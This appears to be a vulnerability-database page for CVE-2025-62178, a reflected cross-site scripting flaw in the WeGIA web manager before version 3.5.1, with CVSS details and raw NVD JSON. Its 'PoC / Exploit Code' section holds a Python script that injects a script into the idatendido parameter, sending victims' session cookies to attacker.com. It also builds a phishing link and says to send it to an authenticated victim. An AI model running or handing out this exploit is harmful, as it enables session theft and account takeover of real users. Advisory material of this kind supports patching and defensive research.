Security Vulnerability Report
中文
CVE-2025-62178 CVSS 3.5 LOW

CVE-2025-62178

Published: 2025-10-13 22:15:33
Last Modified: 2025-10-20 16:06:38
Source: [email protected]

Description

WeGIA is an open source Web Manager for Institutions with a focus on Portuguese language users. Prior to 3.5.1, a Reflected Cross-Site Scripting (XSS) vulnerability was identified in the /html/atendido/cadastro_atendido_parentesco_pessoa_nova.php endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the idatendido parameter. This vulnerability is fixed in 3.5.1.

CVSS Details

CVSS Score
3.5
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:wegia:wegia:*:*:*:*:*:*:*:* - VULNERABLE
WeGIA < 3.5.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62178 - WeGIA Reflected XSS PoC # Vulnerability: Reflected XSS in idatendido parameter # Affected endpoint: /html/atendido/cadastro_atendido_parentesco_pessoa_nova.php # Affected versions: < 3.5.1 import requests TARGET_URL = "http://target-wegia-server" # Attacker needs to be authenticated (PR:H requirement) SESSION_COOKIES = { "PHPSESSID": "authenticated_session_cookie_here" } def exploit_xss(target_url, session_cookies): """ Exploit reflected XSS via idatendido parameter. The malicious script will execute in the victim's browser context. """ endpoint = "/html/atendido/cadastro_atendido_parentesco_pessoa_nova.php" # Malicious payload - steal session cookie and exfiltrate to attacker server payload = '<script>document.location="http://attacker.com/steal?cookie="+document.cookie</script>' params = { "idatendido": payload } # Send the crafted request response = requests.get( target_url + endpoint, params=params, cookies=session_cookies ) print(f"[*] Status Code: {response.status_code}") print(f"[*] Payload injected in idatendido parameter") # Verify the payload is reflected in the response if payload in response.text or "attacker.com" in response.text: print("[+] XSS payload successfully reflected in response!") print("[+] When victim clicks the crafted link, the script will execute.") else: print("[-] Payload may have been sanitized or filtered.") return response # Crafted malicious URL to be sent to the victim def craft_malicious_url(target_url, payload): """Generate a malicious URL that can be sent to victims via phishing.""" import urllib.parse endpoint = "/html/atendido/cadastro_atendido_parentesco_pessoa_nova.php" encoded_payload = urllib.parse.quote(payload) malicious_url = f"{target_url}{endpoint}?idatendido={encoded_payload}" return malicious_url if __name__ == "__main__": payload = '<script>document.location="http://attacker.com/steal?cookie="+document.cookie</script>' # Generate phishing URL url = craft_malicious_url(TARGET_URL, payload) print(f"[*] Malicious URL: {url}") print(f"[*] Send this URL to an authenticated victim via email/chat") # Execute exploit exploit_xss(TARGET_URL, SESSION_COOKIES)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62178", "sourceIdentifier": "[email protected]", "published": "2025-10-13T22:15:32.560", "lastModified": "2025-10-20T16:06:38.403", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WeGIA is an open source Web Manager for Institutions with a focus on Portuguese language users. Prior to 3.5.1, a Reflected Cross-Site Scripting (XSS) vulnerability was identified in the /html/atendido/cadastro_atendido_parentesco_pessoa_nova.php endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the idatendido parameter. This vulnerability is fixed in 3.5.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wegia:wegia:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.5.1", "matchCriteriaId": "0380F435-A37D-48F3-87E5-A2648574EDC0"}]}]}], "references": [{"url": "https://github.com/LabRedesCefetRJ/WeGIA/commit/e39390f2c0172e8a127b9437e15e71ac4a0e77cf", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/LabRedesCefetRJ/WeGIA/issues/1181", "source": "[email protected]", "tags": ["Issue Tracking", "Mitigation", "Vendor Advisory"]}, {"url": "https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-fj32-779r-28qv", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.